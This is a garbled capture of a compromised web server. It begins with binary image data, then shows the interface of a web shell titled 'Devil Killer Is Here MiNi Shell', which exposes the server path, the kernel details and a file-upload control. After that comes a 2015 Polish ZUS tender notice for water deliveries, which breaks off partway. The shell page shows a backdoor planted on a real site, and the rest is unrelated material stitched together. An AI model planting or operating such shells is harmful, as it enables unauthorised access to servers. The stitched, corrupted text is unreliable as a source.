JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/80624-N-2015.html

<p class="kh_header"><b>Biłgoraj: Dostawy wody mineralnej i źródlanej dla Oddziałów ZUS w Biłgoraju, Kielcach, Lublinie i Rzeszowie oraz podległych jednostek terenowych</b><br>
<b>Numer ogłoszenia: 80624 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju , ul. Kościuszki 103, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6881202, 6881209, faks 84 6866974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy wody mineralnej i źródlanej dla Oddziałów ZUS w Biłgoraju, Kielcach, Lublinie i Rzeszowie oraz podległych jednostek terenowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy wody mineralnej i źródlanej dla Oddziałów ZUS w Biłgoraju, Kielcach, Lublinie i Rzeszowie oraz podległych jednostek terenowych. 
2. Zamawiający dopuszcza składanie ofert częściowych w rozumieniu art. 36 ust. 2 pkt 1) ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2013r. poz. 907 z późn. zm.), zwanej dalej upzp wg poniższego rozwiązania z podziałem na 8 części:

1) Część I - Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Biłgoraju oraz podległych jednostek terenowych.
2)  Część II - Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Kielcach oraz podległych jednostek terenowych.
3) Część III - Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Lublinie oraz podległych jednostek terenowych.
4) Część IV - Dostawy wody w  butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Rzeszowie oraz podległych jednostek terenowych.
5) Część V - Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Biłgoraju oraz podległych jednostek terenowych.
6) Część VI - Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Kielcach oraz podległych jednostek terenowych.
7) Część VII - Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Lublinie oraz podległych jednostek terenowych.
8) Część VIII - Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Rzeszowie oraz podległych jednostek terenowych.
3. Każdy z Wykonawców może złożyć ofertę wg wyboru na jedną lub więcej części objętych niniejszym postępowaniem.
4. Szczegółowy opis przedmiotu zamówienia w zakresie poszczególnych części zawierają załączniki: nr 1.1; 1.2; 1.3; 1.4; 1.5; 1.6; 1.7; 1.8 do siwz.
5. Zamawiający informuje, że ilości poszczególnych rodzajów wody wskazane w załącznikach nr 1.1 - 1.8 do siwz są wielkościami szacunkowymi, przyjętymi dla celu porównania ofert i wyboru najkorzystniejszej oferty w danej części. 
6. Szczegółowe zasady realizacji przedmiotu zamówienia zawierają również istotne postanowienia umowy (zał. nr 10 do siwz w zakresie wszystkich części). 
7. Oferowana woda musi spełniać w szczególności wymagania określone w: 
1) ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm.) oraz 
2) rozporządzeniu Ministra Zdrowia z dnia 31 marca 2011 r. w sprawie naturalnych wód mineralnych, wód źródlanych i wód stołowych (Dz.U. Nr 85, poz. 466). 
3) ustawie z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów (Dz. U. z 2015 r. poz. 322).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3, 39.22.21.20-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Dokumenty wymagane na potwierdzenie spełniania warunku:
a) oświadczenie z art. 22 ust.1 upzp.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Dokumenty wymagane na potwierdzenie spełniania warunku:
a) oświadczenie z art. 22 ust.1 upzp.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Dokumenty wymagane na potwierdzenie spełniania warunku:
a) oświadczenie z art. 22 ust.1 upzp.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Dokumenty wymagane na potwierdzenie spełniania warunku:
a) oświadczenie z art. 22 ust.1 upzp.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Dokumenty wymagane na potwierdzenie spełniania warunku:
a) oświadczenie z art. 22 ust.1 upzp.
Ocena spełniania w/w warunku w zakresie każdej części zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty wypełniony (stosownie do części na którą składana jest oferta) i podpisany. 
2) Formularz cenowy (właściwy dla części na którą składana jest oferta) wypełniony i podpisany . 
3) Pełnomocnictwo, o ile zachodzi taka potrzeba.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Termin dostawy - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z zastrzeżeniem wynikającym z art. 144 ust. 1 ustawy Prawo zamówień publicznych, wszelkie zmiany i uzupełnienia niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2.Zmiana umowy dokonana z naruszeniem przepisu art. 144 ust.1 ustawy Prawo zamówień publicznych jest nieważna.   
3.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku gdy konieczność wprowadzenia takich zmian wynika z okoliczności których nie można było przewidzieć w chwili zawarcia umowy tj. w szczególności: 
1)Zmiany związane z przyczynami organizacyjnymi po stronie Zamawiającego/Odbiorcy:
a)Zmiana miejsca dostawy wody.
b)Zmiany zasad i terminów dostarczania wody wynikające z przyczyn leżących po stronie Zamawiającego/Odbiorcy. 
c)Zmiana okresu realizacji umowy tj. skrócenie terminu końcowego do którego miała być realizowana w wyniku wyczerpania maksymalnej wartości (określonej w § 4 ust. 1). 
d)Zmiana terminu płatności lub sposobu jego liczenia wynikająca z przyczyn leżących po stronie Zamawiającego/Odbiorcy. 
e)Zmiana podwykonawcy ujawnionego w umowie na innego lub rezygnacja z podwykonawcy na rzecz samodzielnej realizacji umowy.
f)Wydłużenie przez Wykonawcę okresu gwarancji na dostarczaną wodę o dowolny okres. 
g) Koniecznośćwprowadzenia zmiany, która jest korzystna dla Zamawiającego. Wprowadzenie takiej zmiany jest możliwe pod warunkiem, że gdyby hipotetycznie dokonać jej wprowadzenia przed terminem składania ofert nie miałoby to wpływu na krąg Wykonawców ani też na wybór oferty najkorzystniejszej w danej części.
h) Niedostępność danego asortymentu wody wg parametrów wskazanych w siwz spowodowana zaprzestaniem produkcji lub wycofaniem z rynku. Dopuszcza się wówczas dostarczenie wody o parametrach (w szczególności: jakość, skład mineralny) nie gorszych od pierwotnych po cenie nie wyższej niż określona dla produktu pierwotnego.
2) Zmiany wynikające ze zmiany przepisów prawa: 
a) Wysokość wynagrodzenia Wykonawcy, o którym mowa w § 4 ust. 1 może ulec zmianie z zastrzeżeniem postanowień lit. b) i c) w przypadku zmiany:
- stawki podatku od towarów i usług (VAT),
- wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679,  z późn. zm.),
- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę.
b)	W przypadku zmiany przepisów, o których mowa w lit. a), skutkujących zmianą kosztów wykonania przedmiotu umowy przez Wykonawcę, każda ze Stron umowy, w terminie 30 dni od wejścia w życie przepisów wprowadzających te zmiany, może wystąpić do drugiej Strony o przeprowadzenie negocjacji w sprawie dokonania odpowiedniej zmiany wysokości wynagrodzenia (zmniejszenia lub zwiększenia).
c)	Podstawą do przeprowadzenia negocjacji, o których mowa w lit. b), będzie przedstawiana Zamawiającemu na jego każdorazowe pisemne żądanie w ciągu 5 dni od otrzymania tego żądania, kalkulacja kosztów Wykonawcy, uwzględniająca wpływ znowelizowanych przepisów na koszty wykonania przedmiotu umowy przez Wykonawcę. 
d)	koszty ewentualnych zmian wynagrodzenia, o których mowa w lit. a) - c) będą obciążały w równym stopniu każdą ze Stron umowy. 
e)	Konieczność dostarczania wody odmiennej niż wskazana w ofercie (tj. inna nazwa handlowa, producent) ale zgodnej z opisem przedmiotu zamówienia w wyniku zmiany obowiązującego prawa. Dokonana zmiana prawa musi powodować, że wskazana w ofercie woda nie może funkcjonować w obrocie handlowym.
f)	konieczność wprowadzenia innych zmian w umowie wynikająca z innych zmian bezwzględnie obowiązujących przepisów prawa, w oparciu, o które realizowana jest umowa.
4.	Nie stanowią zmiany umowy w szczególności:
1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego na który jest regulowane wynagrodzenie), 
2)	zmiany danych teleadresowych, 
3)	zmiana osób upoważnionych do kontaktu w zakresie realizacji umowy o których mowa w § 10 ust. 6,
4)	utrata mocy lub zmiana aktów prawnych przywołanych w treści umowy, do których stosować należy przepisy obowiązujące w danym czasie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju, Centrum Zamówień Publicznych, ul. Kościuszki 103, 23-400 Biłgoraj, tel.84 688 12 02, 84 688 12 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2015 godzina 11:00, miejsce: Zakład  Ubezpieczeń  Społecznych Oddział w Biłgoraju, Centrum Zamówień Publicznych ul. Kościuszki  103, 23-400 Biłgoraj, sala obsługi klienta stanowisko INFORMACJA OGÓLNA-dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie jest w całości finansowane ze środków krajowych. 
2. Osoby uprawnione do porozumiewania się z Wykonawcami w zakresie ogólnym nie dotyczącym oświadczeń woli w zakresie wyjaśniania siwz w rozumieniu art. 38 ust.1 upzp:
a) Dariusz Cios - Centrum Zamówień Publicznych tel. (84) 688 12 02, Biłgoraj, ul. Kościuszki 103.
b) Sabina Nizio - Centrum Zamówień Publicznych tel. (84) 688 12 11, Biłgoraj, ul. Kościuszki 103. 
2. Osoby o których mowa w ust. 2 udzielają informacji w godz.  8:00 do 14:00 w dni robocze z wyjątkiem sobót i dni ustawowo wolnych od pracy. 
3. Numer postępowania nadany sprawie przez Zamawiającego: 030000/271/2/2015-CZP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Biłgoraju oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody w następujących asortymentach i parametrach:
1. Woda mineralna średniozmineralizowana gazowana w butelkach PET o poj. 1,5 l - 9630 szt.;
2. Woda mineralna średniozmineralizowana  niegazowana w butelkach PET o poj. 1,5 l - 9630 szt.;
3. Woda mineralna średniozmineralizowana gazowana w butelkach PET o poj. 0,5 l -1320 szt.;
4.Woda mineralna średniozmineralizowana  niegazowana w butelkach PET o poj. 0,5 l - 1530 szt.;
Woda ma być dostarczana do następujących jednostek Zamawiajacego: a) Oddział ZUS w Biłgoraju przy ul. Kościuszki 103, b) Oddział ZUS w Biłgoraju przy ul. Krzeszowskiej 62a, c) Inspektorat ZUS w Chełmie przy ul. I Armii Wojska Polskiego 8, d) Inspektorat ZUS w Tomaszowie Lub. przy ul. Jana Pawła II 6, e) Inspektorat ZUS w Zamościu przy ul. Kiepury 2, f) Inspektorat ZUS w Hrubieszowie ul. 3-go Maja 8a.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Kielcach oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody w następujących asortymentach i parametrach:
1. Woda mineralna gazowana w butelkach PET o poj. 1,5 l zawierająca co najmniej 740 mg składników mineralnych w 1 litrze - 12000 szt.;
2. Woda mineralna niegazowana w butelkach PET o poj. 1,5 l zawierająca co najmniej 740 mg składników mineralnych w 1 litrze - 16500 szt.;
3. Woda źródlana gazowana w butelkach PET o poj. 1,5 l zawierająca co najmniej 310 mg składników mineralnych w 1 l  -216 szt.;
4.Woda źródlana gazowana w butelkach PET o poj. 0,5 l zawierająca co najmniej 310 mg składników mineralnych w 1 l - 276 szt.;
5. Woda źródlana niegazowana w butelkach PET o poj. 1,5 l zawierająca co najmniej 230 mg  składników mineralnych w 1 l - 120 szt.;
6. Woda  źródlana  niegazowana w butelkach PET o poj. 0,5 l zawierająca co najmniej 230 mg  składników mineralnych w 1 l - 396 szt.;
7. Woda mineralna niegazowana w butelkach szklanych zwrotnych o poj. 0,33 l zawierająca co najmniej 650 mg składników mineralnych w 1 l - 120 szt.;
Woda ma być dostarczana do następujących jednostek  a) Oddział ZUS w Kielcach przy ul. Kolberga 1A, b) Oddział ZUS w Kielcach przy ul. Piotrkowskiej 27..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Lublinie oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody w następujących asortymentach i parametrach:
